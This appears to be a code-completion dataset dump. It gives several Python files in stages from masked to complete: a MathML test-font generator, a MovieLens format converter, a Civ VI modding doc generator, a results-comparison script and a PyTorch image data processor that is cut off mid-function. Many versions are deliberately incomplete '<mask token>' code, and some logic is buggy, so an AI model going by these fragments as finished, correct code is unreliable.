f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = v
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = 0
mathfont.save(f)
v1 = 3 * mathfont.em
v2 = 1 * mathfont.em
f = mathfont.create("stack-topdisplaystyleshiftup%d-axisheight%d" % (v1, v2),
"Copyright (c) 2016 MathML Association")
f.math.AxisHeight = v2
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = v1
f.math.StackTopShiftUp = 0
mathfont.save(f)
v1 = 9 * mathfont.em
v2 = 1 * mathfont.em
f = mathfont.create("stack-topshiftup%d-axisheight%d" % (v1, v2),
"Copyright (c) 2016 MathML Association")
f.math.AxisHeight = v2
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = v1
mathfont.save(f)
| [
0,
1,
2,
3,
4
] |
76 | 2dd59681a0dcb5d3f1143385100c09c7783babf4 | <mask token>
| <mask token>
for line in ratings_dat:
arr = line.split('::')
new_line = '\t'.join(arr)
ratings_csv.write(new_line)
ratings_dat.close()
ratings_csv.close()
| ratings_dat = open('../data/movielens-1m/users.dat', 'r')
ratings_csv = open('../data/movielens-1m/users.txt', 'w')
for line in ratings_dat:
arr = line.split('::')
new_line = '\t'.join(arr)
ratings_csv.write(new_line)
ratings_dat.close()
ratings_csv.close()
| #!/usr/bin/env python
# script :: creating a datamodel that fits mahout from ratings.dat
ratings_dat = open('../data/movielens-1m/users.dat', 'r')
ratings_csv = open('../data/movielens-1m/users.txt', 'w')
for line in ratings_dat:
arr = line.split('::')
new_line = '\t'.join(arr)
ratings_csv.write(new_line)
ratings_dat.close()
ratings_csv.close()
| null | [
0,
1,
2,
3
] |
77 | 5ce98ae241c0982eeb1027ffcff5b770f94ff1a3 | <mask token>
| <mask token>
with open('Civ VI Modding Companion - Events.csv', newline='') as csvfile:
reader = csv.reader(csvfile, delimiter=',', quotechar='|')
for row in reader:
if i < 4:
i += 1
continue
eventName = row[3]
eventType = 'GameEvents' if len(row[10]) > 0 else 'Events'
argumentName = row[4]
argumentType = row[5][1:]
try:
events[eventName]
except Exception:
events[eventName] = {'eventType': eventType, 'arguments': []}
eventTypes.add(eventType)
if argumentName:
argumentText = '`' + argumentName
if argumentType:
argumentText += ' [' + argumentType + ']'
argumentText += '`'
events[eventName]['arguments'].append(argumentText)
for eventType in eventTypes:
filename = '../EventObjects/' + eventType + '.md'
os.makedirs(os.path.dirname(filename), exist_ok=True)
f = open(filename, 'w')
eventIndices[eventType] = f
f.write('## Static Events\n')
f.write('Events can be subscribed by using `' + eventType +
'.SomeEvent.Add(SomeFunction)`.\n')
f.write('\n')
f.write('| Name | Parameters |\n')
f.write('|:---- |:--------- |\n')
for eventName in events:
event = events[eventName]
eventType = event['eventType']
eventIndex = eventIndices[eventType]
arguments = event['arguments']
indexEntry = '| [[' + eventType + '.' + eventName + ']] | '
if len(arguments) > 0:
indexEntry += '<br/>'.join(arguments)
indexEntry += ' |\n'
eventIndex.write(indexEntry)
fullName = eventType + '.' + eventName
filename = ('../EventObjects/' + eventType + '/' + eventType + '.' +
eventName + '.md')
os.makedirs(os.path.dirname(filename), exist_ok=True)
f = open(filename, 'w')
f.write('# ' + fullName + '\n')
f.write('## Description\n')
f.write('TBD\n')
f.write('\n')
f.write('## Usage\n')
argumentsText = ', '.join(arguments)
argumentsText = argumentsText.replace('`', '')
f.write('> `' + fullName + '(' + argumentsText + ')`\n\n')
f.write('Regular event: you can subscribe to it through `' + fullName +
""".Add(<function handler>)`
""")
f.write('\n')
f.write('### Parameters\n')
argumentsList = '\n- '.join(arguments)
if len(argumentsList) > 0:
argumentsList = '- ' + argumentsList
f.write(argumentsList)
| <mask token>
events = {}
eventTypes = set()
eventIndices = {}
i = 0
with open('Civ VI Modding Companion - Events.csv', newline='') as csvfile:
reader = csv.reader(csvfile, delimiter=',', quotechar='|')
for row in reader:
if i < 4:
i += 1
continue
eventName = row[3]
eventType = 'GameEvents' if len(row[10]) > 0 else 'Events'
argumentName = row[4]
argumentType = row[5][1:]
try:
events[eventName]
except Exception:
events[eventName] = {'eventType': eventType, 'arguments': []}
eventTypes.add(eventType)
if argumentName:
argumentText = '`' + argumentName
if argumentType:
argumentText += ' [' + argumentType + ']'
argumentText += '`'
events[eventName]['arguments'].append(argumentText)
for eventType in eventTypes:
filename = '../EventObjects/' + eventType + '.md'
os.makedirs(os.path.dirname(filename), exist_ok=True)
f = open(filename, 'w')
eventIndices[eventType] = f
f.write('## Static Events\n')
f.write('Events can be subscribed by using `' + eventType +
'.SomeEvent.Add(SomeFunction)`.\n')
f.write('\n')
f.write('| Name | Parameters |\n')
f.write('|:---- |:--------- |\n')
for eventName in events:
event = events[eventName]
eventType = event['eventType']
eventIndex = eventIndices[eventType]
arguments = event['arguments']
indexEntry = '| [[' + eventType + '.' + eventName + ']] | '
if len(arguments) > 0:
indexEntry += '<br/>'.join(arguments)
indexEntry += ' |\n'
eventIndex.write(indexEntry)
fullName = eventType + '.' + eventName
filename = ('../EventObjects/' + eventType + '/' + eventType + '.' +
eventName + '.md')
os.makedirs(os.path.dirname(filename), exist_ok=True)
f = open(filename, 'w')
f.write('# ' + fullName + '\n')
f.write('## Description\n')
f.write('TBD\n')
f.write('\n')
f.write('## Usage\n')
argumentsText = ', '.join(arguments)
argumentsText = argumentsText.replace('`', '')
f.write('> `' + fullName + '(' + argumentsText + ')`\n\n')
f.write('Regular event: you can subscribe to it through `' + fullName +
""".Add(<function handler>)`
""")
f.write('\n')
f.write('### Parameters\n')
argumentsList = '\n- '.join(arguments)
if len(argumentsList) > 0:
argumentsList = '- ' + argumentsList
f.write(argumentsList)
| import csv
import os
events = {}
eventTypes = set()
eventIndices = {}
i = 0
with open('Civ VI Modding Companion - Events.csv', newline='') as csvfile:
reader = csv.reader(csvfile, delimiter=',', quotechar='|')
for row in reader:
if i < 4:
i += 1
continue
eventName = row[3]
eventType = 'GameEvents' if len(row[10]) > 0 else 'Events'
argumentName = row[4]
argumentType = row[5][1:]
try:
events[eventName]
except Exception:
events[eventName] = {'eventType': eventType, 'arguments': []}
eventTypes.add(eventType)
if argumentName:
argumentText = '`' + argumentName
if argumentType:
argumentText += ' [' + argumentType + ']'
argumentText += '`'
events[eventName]['arguments'].append(argumentText)
for eventType in eventTypes:
filename = '../EventObjects/' + eventType + '.md'
os.makedirs(os.path.dirname(filename), exist_ok=True)
f = open(filename, 'w')
eventIndices[eventType] = f
f.write('## Static Events\n')
f.write('Events can be subscribed by using `' + eventType +
'.SomeEvent.Add(SomeFunction)`.\n')
f.write('\n')
f.write('| Name | Parameters |\n')
f.write('|:---- |:--------- |\n')
for eventName in events:
event = events[eventName]
eventType = event['eventType']
eventIndex = eventIndices[eventType]
arguments = event['arguments']
indexEntry = '| [[' + eventType + '.' + eventName + ']] | '
if len(arguments) > 0:
indexEntry += '<br/>'.join(arguments)
indexEntry += ' |\n'
eventIndex.write(indexEntry)
fullName = eventType + '.' + eventName
filename = ('../EventObjects/' + eventType + '/' + eventType + '.' +
eventName + '.md')
os.makedirs(os.path.dirname(filename), exist_ok=True)
f = open(filename, 'w')
f.write('# ' + fullName + '\n')
f.write('## Description\n')
f.write('TBD\n')
f.write('\n')
f.write('## Usage\n')
argumentsText = ', '.join(arguments)
argumentsText = argumentsText.replace('`', '')
f.write('> `' + fullName + '(' + argumentsText + ')`\n\n')
f.write('Regular event: you can subscribe to it through `' + fullName +
""".Add(<function handler>)`
""")
f.write('\n')
f.write('### Parameters\n')
argumentsList = '\n- '.join(arguments)
if len(argumentsList) > 0:
argumentsList = '- ' + argumentsList
f.write(argumentsList)
| import csv
import os
events = {}
eventTypes = set()
eventIndices = {}
i = 0
with open('Civ VI Modding Companion - Events.csv', newline='') as csvfile:
reader = csv.reader(csvfile, delimiter=',', quotechar='|')
for row in reader:
if i < 4:
i += 1
continue
eventName = row[3]
eventType = "GameEvents" if len(row[10]) > 0 else "Events"
argumentName = row[4]
argumentType = row[5][1:]
try:
events[eventName]
except Exception:
events[eventName] = {'eventType': eventType, 'arguments': []}
eventTypes.add(eventType)
if argumentName:
argumentText = '`' + argumentName
if argumentType:
argumentText += ' [' + argumentType + ']'
argumentText += '`'
# argument = {'argumentName': argumentName, 'argumentType': argumentType, 'argumentText': argumentText}
events[eventName]['arguments'].append(argumentText)
for eventType in eventTypes:
filename = '../EventObjects/' + eventType + '.md'
os.makedirs(os.path.dirname(filename), exist_ok=True)
f = open(filename, "w")
eventIndices[eventType] = f
f.write('## Static Events\n')
f.write('Events can be subscribed by using `' + eventType + '.SomeEvent.Add(SomeFunction)`.\n')
f.write('\n')
f.write('| Name | Parameters |\n')
f.write('|:---- |:--------- |\n')
for eventName in events:
event = events[eventName]
eventType = event['eventType']
eventIndex = eventIndices[eventType]
arguments = event['arguments']
# -----------------------
# Create Index Entry
# -----------------------
indexEntry = '| [[' + eventType + "." + eventName + ']] | '
if len(arguments) > 0:
indexEntry += "<br/>".join(arguments)
indexEntry += ' |\n'
eventIndex.write(indexEntry)
# -----------------------
# Create Event File
# -----------------------
fullName = eventType + '.' + eventName
filename = '../EventObjects/' + eventType + '/' + eventType + "." + eventName + '.md'
os.makedirs(os.path.dirname(filename), exist_ok=True)
f = open(filename, "w")
f.write('# ' + fullName + "\n")
f.write('## Description\n')
f.write('TBD\n')
f.write('\n')
f.write('## Usage\n')
argumentsText = (", ".join(arguments))
argumentsText = argumentsText.replace('`', '')
f.write('> `' + fullName + '(' + argumentsText + ')`\n\n')
f.write('Regular event: you can subscribe to it through `' + fullName + '.Add(<function handler>)`\n')
f.write('\n')
f.write('### Parameters\n')
argumentsList = "\n- ".join(arguments)
if len(argumentsList) > 0:
argumentsList = '- ' + argumentsList
f.write(argumentsList)
| [
0,
1,
2,
3,
4
] |
78 | 79c043fc862e77bea5adc3f1c6bb9a6272f19c75 | <mask token>
| <mask token>
name = socket.gethostname()
| import socket
name = socket.gethostname()
| #!/usr/bin/env python
import socket
name = socket.gethostname()
| null | [
0,
1,
2,
3
] |
79 | 22c498d84f40455d89ed32ccf3bf8778cb159579 | <mask token>
| <mask token>
if __name__ == '__main__':
bestPrecision = [0, 0, 0, 0, 0, 0]
bestPrecisionFile = ['', '', '', '', '', '']
bestRecall = [0, 0, 0, 0, 0, 0]
bestRecallFile = ['', '', '', '', '', '']
bestSupport = [0, 0, 0, 0, 0, 0]
bestSupportFile = ['', '', '', '', '', '']
bestF1_Score = [0, 0, 0, 0, 0, 0]
bestF1_ScoreFile = ['', '', '', '', '', '']
bestPrecisionOverall = 0
bestPrecisionOverallFile = ''
bestRecallOverall = 0
bestRecallOverallFile = ''
bestSupportOverall = 0
bestSupportOverallFile = ''
bestF1_ScoreOverall = 0
bestF1_ScoreOverallFile = ''
for file in os.listdir('results'):
df = pd.read_csv('results/' + file)
for i in range(0, 6):
if bestF1_Score[i] < df['f1_score'][i]:
bestF1_Score[i] = df['f1_score'][i]
bestF1_ScoreFile[i] = file
if bestPrecision[i] < df['precision'][i]:
bestPrecision[i] = df['precision'][i]
bestPrecisionFile[i] = file
if bestRecall[i] < df['recall'][i]:
bestRecall[i] = df['recall'][i]
bestRecallFile[i] = file
if bestSupport[i] < df['support'][i]:
bestSupport[i] = df['support'][i]
bestSupportFile[i] = file
currPrecision = 0
currRecall = 0
currSupport = 0
currF1_Score = 0
for idx, value in enumerate([0.359, 0.256, 0.205, 0.087, 0.073, 0.016]
):
currF1_Score += value * df['f1_score'][idx]
currPrecision += value * df['precision'][idx]
currRecall += value * df['recall'][idx]
currSupport += value * df['support'][idx]
if currPrecision > bestPrecisionOverall:
bestPrecisionOverall = currPrecision
bestPrecisionOverallFile = file
print(file)
print(bestPrecisionOverall)
if currRecall > bestRecallOverall:
bestRecallOverall = currRecall
bestRecallOverallFile = file
if currSupport > bestSupportOverall:
bestSupportOverall = currSupport
bestSupportOverallFile = file
if currF1_Score > bestF1_ScoreOverall:
bestF1_ScoreOverall = currF1_Score
bestF1_ScoreOverallFile = file
bestPrecision.insert(0, 'Precision')
bestPrecisionFile.insert(0, 'Precision')
bestRecall.insert(0, 'Recall')
bestRecallFile.insert(0, 'Recall')
bestSupport.insert(0, 'Support')
bestSupportFile.insert(0, 'Support')
bestF1_Score.insert(0, 'F1_SCORE')
bestF1_ScoreFile.insert(0, 'F1_SCORE')
tableSpecific = [['', 'Class0', 'Class1', 'Class2', 'Class3', 'Class4',
'Class5'], bestPrecision, bestPrecisionFile, bestRecall,
bestRecallFile, bestSupport, bestSupportFile, bestF1_Score,
bestF1_ScoreFile]
tableGeneral = [['Precision Best', 'Recall Best', 'Support Best',
'F1_Score Best'], [bestPrecisionOverall, bestRecallOverall,
bestSupportOverall, bestF1_ScoreOverall], [bestPrecisionOverallFile,
bestRecallOverallFile, bestSupportOverallFile, bestF1_ScoreOverallFile]
]
print(tabulate(tableSpecific))
print(tabulate(tableGeneral))
| import os
import pandas as pd
from tabulate import tabulate
if __name__ == '__main__':
bestPrecision = [0, 0, 0, 0, 0, 0]
bestPrecisionFile = ['', '', '', '', '', '']
bestRecall = [0, 0, 0, 0, 0, 0]
bestRecallFile = ['', '', '', '', '', '']
bestSupport = [0, 0, 0, 0, 0, 0]
bestSupportFile = ['', '', '', '', '', '']
bestF1_Score = [0, 0, 0, 0, 0, 0]
bestF1_ScoreFile = ['', '', '', '', '', '']
bestPrecisionOverall = 0
bestPrecisionOverallFile = ''
bestRecallOverall = 0
bestRecallOverallFile = ''
bestSupportOverall = 0
bestSupportOverallFile = ''
bestF1_ScoreOverall = 0
bestF1_ScoreOverallFile = ''
for file in os.listdir('results'):
df = pd.read_csv('results/' + file)
for i in range(0, 6):
if bestF1_Score[i] < df['f1_score'][i]:
bestF1_Score[i] = df['f1_score'][i]
bestF1_ScoreFile[i] = file
if bestPrecision[i] < df['precision'][i]:
bestPrecision[i] = df['precision'][i]
bestPrecisionFile[i] = file
if bestRecall[i] < df['recall'][i]:
bestRecall[i] = df['recall'][i]
bestRecallFile[i] = file
if bestSupport[i] < df['support'][i]:
bestSupport[i] = df['support'][i]
bestSupportFile[i] = file
currPrecision = 0
currRecall = 0
currSupport = 0
currF1_Score = 0
for idx, value in enumerate([0.359, 0.256, 0.205, 0.087, 0.073, 0.016]
):
currF1_Score += value * df['f1_score'][idx]
currPrecision += value * df['precision'][idx]
currRecall += value * df['recall'][idx]
currSupport += value * df['support'][idx]
if currPrecision > bestPrecisionOverall:
bestPrecisionOverall = currPrecision
bestPrecisionOverallFile = file
print(file)
print(bestPrecisionOverall)
if currRecall > bestRecallOverall:
bestRecallOverall = currRecall
bestRecallOverallFile = file
if currSupport > bestSupportOverall:
bestSupportOverall = currSupport
bestSupportOverallFile = file
if currF1_Score > bestF1_ScoreOverall:
bestF1_ScoreOverall = currF1_Score
bestF1_ScoreOverallFile = file
bestPrecision.insert(0, 'Precision')
bestPrecisionFile.insert(0, 'Precision')
bestRecall.insert(0, 'Recall')
bestRecallFile.insert(0, 'Recall')
bestSupport.insert(0, 'Support')
bestSupportFile.insert(0, 'Support')
bestF1_Score.insert(0, 'F1_SCORE')
bestF1_ScoreFile.insert(0, 'F1_SCORE')
tableSpecific = [['', 'Class0', 'Class1', 'Class2', 'Class3', 'Class4',
'Class5'], bestPrecision, bestPrecisionFile, bestRecall,
bestRecallFile, bestSupport, bestSupportFile, bestF1_Score,
bestF1_ScoreFile]
tableGeneral = [['Precision Best', 'Recall Best', 'Support Best',
'F1_Score Best'], [bestPrecisionOverall, bestRecallOverall,
bestSupportOverall, bestF1_ScoreOverall], [bestPrecisionOverallFile,
bestRecallOverallFile, bestSupportOverallFile, bestF1_ScoreOverallFile]
]
print(tabulate(tableSpecific))
print(tabulate(tableGeneral))
| import os
import pandas as pd
from tabulate import tabulate
if __name__ == '__main__':
bestPrecision = [0,0,0,0,0,0]
bestPrecisionFile = ['','','','','','']
bestRecall = [0,0,0,0,0,0]
bestRecallFile = ['','','','','','']
bestSupport = [0,0,0,0,0,0]
bestSupportFile = ['','','','','','']
bestF1_Score = [0,0,0,0,0,0]
bestF1_ScoreFile = ['','','','','','']
bestPrecisionOverall = 0
bestPrecisionOverallFile = ''
bestRecallOverall = 0
bestRecallOverallFile = ''
bestSupportOverall = 0
bestSupportOverallFile = ''
bestF1_ScoreOverall = 0
bestF1_ScoreOverallFile = ''
for file in os.listdir("results"):
# (0.359*a)+(0.256*b)+(0.205*c)+(0.087*d)+(0.073*e)+(0.016*f)
df = pd.read_csv("results/"+file)
for i in range(0,6):
if bestF1_Score[i] < df["f1_score"][i]:
bestF1_Score[i] = df["f1_score"][i]
bestF1_ScoreFile[i]=file
if bestPrecision[i] < df["precision"][i]:
bestPrecision[i] = df["precision"][i]
bestPrecisionFile[i] = file
if bestRecall[i] < df["recall"][i]:
bestRecall[i] = df["recall"][i]
bestRecallFile[i] = file
if bestSupport[i] < df["support"][i]:
bestSupport[i] = df["support"][i]
bestSupportFile[i] = file
currPrecision = 0
currRecall = 0
currSupport = 0
currF1_Score = 0
for idx,value in enumerate([0.359,0.256,0.205,0.087,0.073,0.016]):
currF1_Score += (value * df["f1_score"][idx])
currPrecision += (value * df["precision"][idx])
currRecall += (value * df["recall"][idx])
currSupport += (value * df["support"][idx])
if currPrecision > bestPrecisionOverall:
bestPrecisionOverall=currPrecision
bestPrecisionOverallFile = file
print(file)
print(bestPrecisionOverall)
if currRecall > bestRecallOverall:
bestRecallOverall=currRecall
bestRecallOverallFile = file
if currSupport > bestSupportOverall:
bestSupportOverall=currSupport
bestSupportOverallFile = file
if currF1_Score > bestF1_ScoreOverall:
bestF1_ScoreOverall=currF1_Score
bestF1_ScoreOverallFile = file
bestPrecision.insert(0,"Precision")
bestPrecisionFile.insert(0, "Precision")
bestRecall.insert(0, "Recall")
bestRecallFile.insert(0, "Recall")
bestSupport.insert(0, "Support")
bestSupportFile.insert(0, "Support")
bestF1_Score.insert(0, "F1_SCORE")
bestF1_ScoreFile.insert(0, "F1_SCORE")
tableSpecific = [["","Class0","Class1","Class2","Class3","Class4","Class5"],
bestPrecision,bestPrecisionFile,bestRecall,bestRecallFile,
bestSupport,bestSupportFile,bestF1_Score,bestF1_ScoreFile]
tableGeneral = [ ["Precision Best","Recall Best","Support Best","F1_Score Best"],
[bestPrecisionOverall,bestRecallOverall,bestSupportOverall,bestF1_ScoreOverall],
[bestPrecisionOverallFile,bestRecallOverallFile,bestSupportOverallFile,bestF1_ScoreOverallFile]]
print(tabulate(tableSpecific))
print(tabulate(tableGeneral))
| null | [
0,
1,
2,
3
] |
80 | 5b8c95354f8b27eff8226ace52ab9e97f98ae217 | <mask token>
class my_image_csv_dataset(Dataset):
def __init__(self, data_dir, data, transforms_=None, obj=False,
minorities=None, diffs=None, bal_tfms=None):
self.data_dir = data_dir
self.data = data
self.transforms_ = transforms_
self.tfms = None
self.obj = obj
self.minorities = minorities
self.diffs = diffs
self.bal_tfms = bal_tfms
assert transforms_ is not None, print('Please pass some transforms.')
def __len__(self):
return len(self.data)
def __getitem__(self, index):
img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])
img = Image.open(img_path)
img = img.convert('RGB')
img = torchvision.transforms.functional.to_grayscale(img,
num_output_channels=3)
y = self.data.iloc[index, 1]
if self.minorities and self.bal_tfms:
if y in self.minorities:
if hasattr(self.bal_tfms, 'transforms'):
for tr in self.bal_tfms.transforms:
tr.p = self.diffs[y]
l = [self.bal_tfms]
l.extend(self.transforms_)
self.tfms = transforms.Compose(l)
else:
for t in self.bal_tfms:
t.p = self.diffs[y]
self.transforms_[1:1] = self.bal_tfms
self.tfms = transforms.Compose(self.transforms_)
else:
self.tfms = transforms.Compose(self.transforms_)
else:
self.tfms = transforms.Compose(self.transforms_)
x = self.tfms(img)
if self.obj:
s = x.size()[1]
if isinstance(s, tuple):
s = s[0]
row_scale = s / img.size[0]
col_scale = s / img.size[1]
y = rescale_bbox(y, row_scale, col_scale)
y.squeeze_()
y2 = self.data.iloc[index, 2]
y = y, y2
return x, y
class my_image_folder(DatasetFolder):
def __init__(self, root, transform=None, target_transform=None, loader=
default_loader, minorities=None, diffs=None, bal_tfms=None,
tta_tfms=None):
super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,
transform=transform, target_transform=target_transform)
self.imgs = self.samples
self.minorities = minorities
self.diffs = diffs
self.bal_tfms = bal_tfms
self.tta_tfms = tta_tfms
self.tfms = None
def __getitem__(self, index):
path, target = self.samples[index]
sample = self.loader(path)
if self.transform:
if self.minorities and self.bal_tfms:
if target in self.minorities:
if hasattr(self.bal_tfms, 'transforms'):
for tr in self.bal_tfms.transforms:
tr.p = self.diffs[target]
l = [self.bal_tfms]
l.extend(self.transform)
self.tfms = transforms.Compose(l)
else:
for t in self.bal_tfms:
t.p = self.diffs[target]
self.tfms = transforms.Compose(self.bal_tfms + self
.transform)
else:
self.tfms = transforms.Compose(self.transform)
elif self.tta_tfms:
self.tfms = self.tta_tfms
else:
self.tfms = transforms.Compose(self.transform)
sample = self.tfms(sample)
if self.target_transform:
target = self.target_transform(target)
return sample, target
<mask token>
def rescale_bbox(bb, row_scale, col_scale):
bb = bb.reshape((-1, 4))
for b in bb:
r1, c1, r2, c2 = b
b[0] = int(np.round(r1 * col_scale))
b[1] = int(np.round(c1 * row_scale))
b[2] = int(np.round(r2 * col_scale))
b[3] = int(np.round(c2 * row_scale))
bb = bb.reshape((1, -1))
return bb
<mask token>
class DataProcessor:
def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=
False, tr_name='train', val_name='val', test_name='test', extension
=None, setup_data=True):
print('+------------------------------------+')
print('| Dream AI |')
print('+------------------------------------+')
print()
self.device = torch.device('cuda:0' if torch.cuda.is_available() else
'cpu')
(self.data_path, self.train_csv, self.val_csv, self.reg, self.
tr_name, self.val_name, self.test_name, self.extension) = (
data_path, train_csv, val_csv, reg, tr_name, val_name,
test_name, extension)
self.obj = False
self.multi_label = False
if setup_data:
self.set_up_data()
def set_up_data(self, split_size=0.15):
data_path, train_csv, val_csv, tr_name, val_name, test_name = (self
.data_path, self.train_csv, self.val_csv, self.tr_name, self.
val_name, self.test_name)
if not data_path:
data_path = os.getcwd() + '/'
tr_path = os.path.join(data_path, tr_name)
val_path = os.path.join(data_path, val_name)
test_path = os.path.join(data_path, test_name)
if os.path.exists(os.path.join(data_path, tr_name + '.csv')):
train_csv = tr_name + '.csv'
if not train_csv:
print('no')
train_csv, val_csv, test_csv = self.data_from_paths_to_csv(
data_path, tr_path, val_path, test_path)
train_csv_path = os.path.join(data_path, train_csv)
train_df = pd.read_csv(train_csv_path)
if 'Unnamed: 0' in train_df.columns:
train_df = train_df.drop('Unnamed: 0', 1)
if len(train_df.columns) > 2:
self.obj = True
img_names = [str(x) for x in list(train_df.iloc[:, 0])]
if self.extension:
img_names = add_extension(img_names, self.extension)
if val_csv:
val_csv_path = os.path.join(data_path, val_csv)
val_df = pd.read_csv(val_csv_path)
val_targets = list(map(str, list(val_df.iloc[:, 1])))
if test_csv:
test_csv_path = os.path.join(data_path, test_csv)
test_df = pd.read_csv(test_csv_path)
test_targets = list(map(str, list(test_df.iloc[:, 1])))
targets = list(map(str, list(train_df.iloc[:, 1])))
lengths = [len(t) for t in [s.split() for s in targets]]
self.target_lengths = lengths
split_targets = [t.split() for t in targets]
if self.obj:
print('\nObject Detection\n')
int_targets = [list(map(float, x)) for x in split_targets]
zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)
for i, t in enumerate(zero_targets):
t[len(t) - len(int_targets[i]):] = int_targets[i]
zero_targets[i] = t
train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.
FloatTensor) for z in zero_targets]
obj_targets = list(map(str, list(train_df.iloc[:, 2])))
obj_split_targets = [t.split() for t in obj_targets]
try:
obj_split_targets = [list(map(int, x)) for x in
obj_split_targets]
except:
pass
dai_onehot, onehot_classes = one_hot(obj_split_targets, True)
c_names = list(onehot_classes)
class_idx = [[c_names.index(i) for i in c] for c in
obj_split_targets]
zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)
for i, t in enumerate(zero_idx):
t[len(t) - len(class_idx[i]):] = class_idx[i]
zero_idx[i] = t
train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.
LongTensor) for z in zero_idx]
self.data_dir, self.num_classes, self.class_names = data_path, len(
onehot_classes), onehot_classes
elif self.reg:
print('\nRegression\n')
int_targets = [list(map(int, x)) for x in split_targets]
zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)
for i, t in enumerate(zero_targets):
t[len(t) - len(int_targets[i]):] = int_targets[i]
zero_targets[i] = t
train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.
FloatTensor) for z in zero_targets]
self.data_dir, self.num_classes, self.class_names = data_path, max(
lengths), np.unique(zero_targets, axis=1)
elif lengths[1:] != lengths[:-1]:
self.multi_label = True
print('\nMulti-label Classification\n')
try:
split_targets = [list(map(int, x)) for x in split_targets]
except:
pass
dai_onehot, onehot_classes = one_hot(split_targets, self.
multi_label)
train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.
FloatTensor) for x in dai_onehot]
self.data_dir, self.num_classes, self.class_names = data_path, len(
onehot_classes), onehot_classes
else:
print('\nSingle-label Classification\n')
unique_targets = list(np.unique(targets))
target_ids = [unique_targets.index(x) for x in targets]
train_df.iloc[:, 1] = target_ids
if val_csv:
target_ids = [unique_targets.index(x) for x in val_targets]
val_df.iloc[:, 1] = target_ids
if test_csv:
target_ids = [unique_targets.index(x) for x in test_targets]
test_df.iloc[:, 1] = target_ids
self.data_dir, self.num_classes, self.class_names = data_path, len(
unique_targets), unique_targets
if not val_csv:
train_df, val_df = split_df(train_df, split_size)
if not test_csv:
val_df, test_df = split_df(val_df, split_size)
tr_images = [str(x) for x in list(train_df.iloc[:, 0])]
val_images = [str(x) for x in list(val_df.iloc[:, 0])]
test_images = [str(x) for x in list(test_df.iloc[:, 0])]
if self.extension:
tr_images = add_extension(tr_images, self.extension)
val_images = add_extension(val_images, self.extension)
test_images = add_extension(test_images, self.extension)
train_df.iloc[:, 0] = tr_images
val_df.iloc[:, 0] = val_images
test_df.iloc[:, 0] = test_images
train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)
val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)
test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)
self.minorities, self.class_diffs = None, None
if not self.obj or not self.multi_label:
self.minorities, self.class_diffs = get_minorities(train_df)
self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,
self.test_name: test_df}
data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,
'num_classes': self.num_classes, 'class_names': self.
class_names, 'minorities': self.minorities, 'class_diffs': self
.class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}
self.data_dict = data_dict
return data_dict
def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,
test_path=None):
train_df = csv_from_path(tr_path, tr_path)
train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),
index=False)
ret = self.tr_name + '.csv', None
if val_path is not None:
val_exists = os.path.exists(val_path)
if val_exists:
val_df = csv_from_path(val_path, tr_path)
val_df.to_csv(os.path.join(data_path, self.val_name +
'.csv'), index=False)
ret = self.tr_name + '.csv', self.val_name + '.csv'
if test_path is not None:
test_exists = os.path.exists(test_path)
if test_exists:
test_df = csv_from_path(test_path, tr_path)
test_df.to_csv(os.path.join(data_path, self.test_name +
'.csv'), index=False)
ret = (self.tr_name + '.csv', self.val_name + '.csv', self.
test_name + '.csv')
return ret
def get_data(self, data_dict=None, s=(224, 224), dataset=
my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=
None, tta=False, num_workers=4, stats_percentage=0.6):
self.image_size = s
if not data_dict:
data_dict = self.data_dict
data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (
data_dict['data_dfs'], data_dict['data_dir'], data_dict[
'minorities'], data_dict['class_diffs'], data_dict['obj'],
data_dict['multi_label'])
if obj or multi_label:
balance = False
if tta:
tta_tfms = {self.tr_name: transforms.Compose([transforms.
FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack
([transforms.ToTensor()(crop) for crop in crops])),
transforms.Lambda(lambda crops: torch.stack([transforms.
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(
crop) for crop in crops]))]), self.val_name: transforms.
Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda
crops: torch.stack([transforms.ToTensor()(crop) for crop in
crops])), transforms.Lambda(lambda crops: torch.stack([
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224,
0.225])(crop) for crop in crops]))]), self.test_name:
transforms.Compose([transforms.FiveCrop(s[0]), transforms.
Lambda(lambda crops: torch.stack([transforms.ToTensor()(
crop) for crop in crops])), transforms.Lambda(lambda crops:
torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [
0.229, 0.224, 0.225])(crop) for crop in crops]))])}
else:
tta_tfms = None
if not bal_tfms:
bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],
self.val_name: None, self.test_name: None}
else:
bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.
test_name: None}
if obj:
resize_transform = transforms.Resize(s)
else:
resize_transform = transforms.Resize(s)
if not tfms:
tfms = [resize_transform, transforms.ToTensor(), transforms.
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]
else:
